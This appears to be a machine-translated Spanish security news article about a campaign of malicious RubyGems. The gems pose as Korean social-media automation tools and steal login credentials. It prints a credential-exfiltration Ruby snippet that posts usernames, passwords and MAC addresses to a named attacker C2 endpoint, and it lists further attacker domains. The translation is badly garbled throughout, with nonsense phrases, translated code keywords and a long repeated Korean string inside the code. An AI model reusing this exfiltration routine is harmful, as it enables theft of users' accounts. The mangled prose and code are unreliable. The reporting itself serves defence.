Los actores de amenaza comenzaron a deslizar el código malicioso en paquetes legítimos de Rubygems, disfrazando los infantes de infantes de redes como herramientas de automatización de redes sociales a principios de 2023.
En los últimos dos años, los atacantes que operan bajo alias como Zon, Nowon, Kwonsoonje y Soonje han publicado más de 60 gemas que ofrecen características de automatización prometidas: publicación de Bulk, amplificación de compromiso y creación de vínculos de retro
Estos paquetes de plataformas objetivo como Instagram, Twitter/X, Tiktok, WordPress, Telegram, Kakao y Naver, y se han descargado más de 275,000 veces, con instalaciones que persisten en máquinas mucho después de que las gemas individuales se eliminan del índice público.
Socket.dev analistas anotado Que cada joya maliciosa incorpora una interfaz gráfica liviana construida con Glimmer-DSL-Libui, presentada en coreana para atraer a los vendedores de sombrero de gris surcoreano.
Tras el lanzamiento, los usuarios encuentran las indicaciones etiquetadas como “아이디” (ID) y “비밀번호” (contraseña), fomentando la entrada de credenciales de cuenta bajo la apariencia de inicio de sesión legítimo para los servicios de automatización.
En lugar de reenviar estos detalles a las API oficiales, las GEMS exfiltran las credenciales y alojan las direcciones MAC a los servidores controlados por el atacante a través de solicitudes de publicación HTTP.
The Domains ProgramZon (.) Com, AppSpace (.) Kr, MarketingDuo (.) Co (.) Kr, y Seven1.iwinv (.) Net Host PHP Bulletin Board puntos finales que aceptan silenciosamente datos robados.
La evolución de la campaña demuestra un sofisticado compromiso de la cadena de suministro. Las gemas publicadas bajo el alias Zon a menudo se “sacuden”, remotadas de Rubygems, dentro de los días, solo para ser reflejados en cachés de integración continua y redistribuidos con nuevos nombres por el mismo actor.
Captura de pantalla de MarketingDuo (.) CO (.) KR que muestra la interfaz de idioma coreano para herramientas de mensajería a granel (fuente-Socket.dev)
A pesar de los cambios periódicos en la infraestructura, la rutina de robo de credenciales básicas permanece sin cambios, lo que permite la huella digital persistente de huéspedes infectados.
Este enfoque aprovecha la dependencia de los especialistas en marketing de grises en cuentas desechables; Las víctimas rara vez informan que las violaciones, optando por abandonar las identidades comprometidas y continuar las operaciones sin sospecha.
Mecanismo de infección y flujo de trabajo de exfiltración
La gema maliciosa IUZ-64bit ejemplifica el mecanismo de infección compartido en el clúster.
Después de presentar su GUI, la GEM invoca una función que recopila la entrada del usuario y los identificadores del sistema antes de realizar una publicación HTTP al punto final C2 del atacante.
El fragmento de rubí de desfiguración a continuación ilustra el proceso:-
def login_check2 (user_id, user_pw) url = “https://programzon.com/auth/program/signin” # c2 endpoint encabezados = {‘content-thype’ => ‘application/json’} mac = get_mac_address () corporal = {useName: use_id, password: use_pw, Macaddress: ‘인스타 인스타 인스타 인스타 인스타 인스타 인스타 인스타 인스타 인스타 인스타 인스타 인스타 인스타 인스타 인스타 인스타 인스타 인스타.ser_id, contraseña: use_pw, Macaddress: MACDRESS 포스팅 (업로드) 프로그램 ‘} .to_json respuesta = http.post (url, encabezados: encabezados, body: body) payload = json.parse (respuesta.body.to_s) Payload (‘ status ‘) == “0”? “0”: Payload (‘Message’) Fin de código anotado de IUZ-64bit Gem que ilustra la exfiltración de credenciales (fuente-Socket.dev)
Una vez que las credenciales y las direcciones MAC llegan al servidor C2, el atacante puede correlacionar las instalaciones en varios grupos de gemas, rastrear la distribución de la herramienta y mantener el acceso a largo plazo.
Este modelo de doble uso faculta a los especialistas en marketing de sombrero de gris para automatizar las campañas de spam y SEO mientras se canaliza subrepticiamente datos confidenciales al actor de amenazas.
A medida que la campaña persiste, los defensores deben integrar alertas de escaneo de dependencia en tiempo real e instalar tiempo para detectar y bloquear estos paquetes maliciosos antes de infiltrarse en entornos de desarrollo.
Equipe su SOC con el acceso completo a los últimos datos de amenazas de cualquiera. Obtenga una prueba gratuita de 14 días
